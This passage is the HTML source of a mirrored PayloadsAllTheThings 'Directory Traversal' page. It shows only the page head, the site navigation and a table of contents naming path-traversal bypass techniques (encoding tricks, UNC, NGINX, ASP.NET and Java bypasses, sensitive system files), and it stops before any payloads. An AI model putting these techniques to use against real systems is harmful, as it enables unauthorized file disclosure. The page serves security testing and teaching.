wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-26 07:56:18 +02:00
Code Issues Releases Activity
PayloadsAllTheThings/Directory Traversal/index.html

6234 lines
145 KiB
HTML
Raw Blame History

<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<link rel="canonical" href="https://swisskyrepo.github.io/PayloadsAllTheThings/Directory%20Traversal/">
<link rel="prev" href="../Dependency%20Confusion/">
<link rel="next" href="../Dom%20Clobbering/">
<link rel="icon" href="../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.5.3, mkdocs-material-9.5.17">
<title>Directory Traversal - Payloads All The Things</title>
<link rel="stylesheet" href="../assets/stylesheets/main.bcfcd587.min.css">
<link rel="stylesheet" href="../assets/stylesheets/palette.06af60db.min.css">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../custom.css">
<script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce((e,_)=>(e<<5)-e+_.charCodeAt(0),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
<meta property="og:type" content="website" >
<meta property="og:title" content="Directory Traversal - Payloads All The Things" >
<meta property="og:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security" >
<meta property="og:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/Directory Traversal/README.png" >
<meta property="og:image:type" content="image/png" >
<meta property="og:image:width" content="1200" >
<meta property="og:image:height" content="630" >
<meta property="og:url" content="https://swisskyrepo.github.io/PayloadsAllTheThings/Directory%20Traversal/" >
<meta name="twitter:card" content="summary_large_image" >
<meta name="twitter:title" content="Directory Traversal - Payloads All The Things" >
<meta name="twitter:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security" >
<meta name="twitter:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/Directory Traversal/README.png" >
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#directory-traversal" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href=".." title="Payloads All The Things" class="md-header__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2Z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Payloads All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
Directory Traversal
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12 20 8.69Z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12c0-2.42-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12 20 8.69Z"/></svg>
</label>
</form>
<script>var media,input,key,value,palette=__md_get("__palette");if(palette&&palette.color){"(prefers-color-scheme)"===palette.color.media&&(media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']"),palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent"));for([key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12Z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41Z"/></svg>
</button>
</nav>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href=".." title="Payloads All The Things" class="md-nav__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>
</a>
Payloads All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href=".." class="md-nav__link">
<span class="md-ellipsis">
Payloads All The Things
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CONTRIBUTING/" class="md-nav__link">
<span class="md-ellipsis">
CONTRIBUTING
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
API Key Leaks
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
API Key Leaks
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../API%20Key%20Leaks/" class="md-nav__link">
<span class="md-ellipsis">
API Key Leaks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
AWS Amazon Bucket S3
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
AWS Amazon Bucket S3
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../AWS%20Amazon%20Bucket%20S3/" class="md-nav__link">
<span class="md-ellipsis">
Amazon Bucket S3 AWS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Account Takeover
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Account Takeover
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Account%20Takeover/" class="md-nav__link">
<span class="md-ellipsis">
Account Takeover
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Argument Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Argument Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Argument%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Argument Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
Business Logic Errors
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
Business Logic Errors
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Business%20Logic%20Errors/" class="md-nav__link">
<span class="md-ellipsis">
Business Logic Errors
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
CICD
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
CICD
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CICD/" class="md-nav__link">
<span class="md-ellipsis">
CI/CD attacks
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
CORS Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CORS%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
CRLF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
CRLF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CRLF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Carriage Return Line Feed
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
<label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
<span class="md-ellipsis">
CSRF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_11">
<span class="md-nav__icon md-icon"></span>
CSRF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSRF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross-Site Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
<label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
<span class="md-ellipsis">
CSV Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_12">
<span class="md-nav__icon md-icon"></span>
CSV Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSV%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
CSV Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_13" >
<label class="md-nav__link" for="__nav_13" id="__nav_13_label" tabindex="0">
<span class="md-ellipsis">
CVE Exploits
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_13_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_13">
<span class="md-nav__icon md-icon"></span>
CVE Exploits
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CVE%20Exploits/" class="md-nav__link">
<span class="md-ellipsis">
Common Vulnerabilities and Exposures
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE%20Exploits/Log4Shell/" class="md-nav__link">
<span class="md-ellipsis">
CVE-2021-44228 Log4Shell
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
<label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
<span class="md-ellipsis">
Clickjacking
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_14">
<span class="md-nav__icon md-icon"></span>
Clickjacking
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Clickjacking/" class="md-nav__link">
<span class="md-ellipsis">
Clickjacking: Web Application Security Vulnerability
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_15" >
<label class="md-nav__link" for="__nav_15" id="__nav_15_label" tabindex="0">
<span class="md-ellipsis">
Command Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_15_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_15">
<span class="md-nav__icon md-icon"></span>
Command Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Command%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Command Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_16" >
<label class="md-nav__link" for="__nav_16" id="__nav_16_label" tabindex="0">
<span class="md-ellipsis">
DNS Rebinding
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_16_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_16">
<span class="md-nav__icon md-icon"></span>
DNS Rebinding
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../DNS%20Rebinding/" class="md-nav__link">
<span class="md-ellipsis">
DNS Rebinding
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_17" >
<label class="md-nav__link" for="__nav_17" id="__nav_17_label" tabindex="0">
<span class="md-ellipsis">
Dependency Confusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_17_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_17">
<span class="md-nav__icon md-icon"></span>
Dependency Confusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dependency%20Confusion/" class="md-nav__link">
<span class="md-ellipsis">
Dependency Confusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_18" checked>
<label class="md-nav__link" for="__nav_18" id="__nav_18_label" tabindex="0">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_18_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_18">
<span class="md-nav__icon md-icon"></span>
Directory Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
Directory Traversal
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#basic-exploitation" class="md-nav__link">
<span class="md-ellipsis">
Basic exploitation
</span>
</a>
<nav class="md-nav" aria-label="Basic exploitation">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#16-bits-unicode-encoding" class="md-nav__link">
<span class="md-ellipsis">
16 bits Unicode encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#utf-8-unicode-encoding" class="md-nav__link">
<span class="md-ellipsis">
UTF-8 Unicode encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-replaced-by" class="md-nav__link">
<span class="md-ellipsis">
Bypass "../" replaced by ""
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-with" class="md-nav__link">
<span class="md-ellipsis">
Bypass "../" with ";"
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#double-url-encoding" class="md-nav__link">
<span class="md-ellipsis">
Double URL encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#unc-bypass" class="md-nav__link">
<span class="md-ellipsis">
UNC Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#nginxalb-bypass" class="md-nav__link">
<span class="md-ellipsis">
NGINX/ALB Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#aspnet-cookieless-bypass" class="md-nav__link">
<span class="md-ellipsis">
ASPNET Cookieless Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#java-bypass" class="md-nav__link">
<span class="md-ellipsis">
Java Bypass
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#path-traversal" class="md-nav__link">
<span class="md-ellipsis">
Path Traversal
</span>
</a>
<nav class="md-nav" aria-label="Path Traversal">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#interesting-linux-files" class="md-nav__link">
<span class="md-ellipsis">
Interesting Linux files
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#interesting-windows-files" class="md-nav__link">
<span class="md-ellipsis">
Interesting Windows files
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_19" >
<label class="md-nav__link" for="__nav_19" id="__nav_19_label" tabindex="0">
